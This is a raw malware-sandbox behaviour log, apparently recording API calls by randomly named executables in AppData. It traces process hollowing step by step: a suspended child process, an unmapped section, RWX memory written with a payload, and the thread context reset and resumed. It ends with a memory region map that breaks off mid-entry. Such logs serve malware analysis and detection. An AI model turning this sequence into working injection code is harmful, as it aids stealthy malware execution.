GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0099.911] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0099.911] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0099.911] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0099.911] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0099.911] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0099.911] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0099.911] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0099.911] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0099.911] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0099.911] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0100.153] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x201cc [0100.294] PostMessageA (hWnd=0x201cc, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0100.294] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0100.294] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x150000 [0100.294] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x150000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe")) returned 0x34 [0100.294] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0100.294] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xc40, dwThreadId=0xc44)) returned 1 [0100.296] VirtualFree (lpAddress=0x150000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.296] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x150000 [0100.296] GetThreadContext (in: hThread=0x48, lpContext=0x150000 | out: lpContext=0x150000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, 
[18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, 
[113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, 
[294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, 
[475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0100.381] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffde008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0100.381] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0100.389] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0100.390] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x1b4850*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1b4850*, lpNumberOfBytesWritten=0x0) returned 1 [0100.390] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x1b4c50, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0100.390] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x1b4c50*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1b4c50*, lpNumberOfBytesWritten=0x0) returned 1 [0100.397] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x209250*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x209250*, lpNumberOfBytesWritten=0x0) returned 1 [0100.398] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffde008, lpBuffer=0x1b4984*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1b4984*, lpNumberOfBytesWritten=0x0) returned 1 [0100.398] SetThreadContext (hThread=0x48, lpContext=0x150000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, 
FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, 
[80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, 
[263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, 
[444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0100.398] ResumeThread (hThread=0x48) returned 0x1 [0100.398] CloseHandle (hObject=0x48) returned 1 [0100.398] CloseHandle (hObject=0x4c) returned 1 [0100.398] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0100.399] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0100.399] ExitProcess (uExitCode=0x0) Process: id = "25" image_name = "lsfkrhur.exe" filename = "c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe" page_root = "0x7ea16960" os_pid = "0xc14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0xba4" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 
00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1551 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1552 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1553 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1554 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1555 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1556 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1557 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1558 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 1559 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1560 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1561 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: 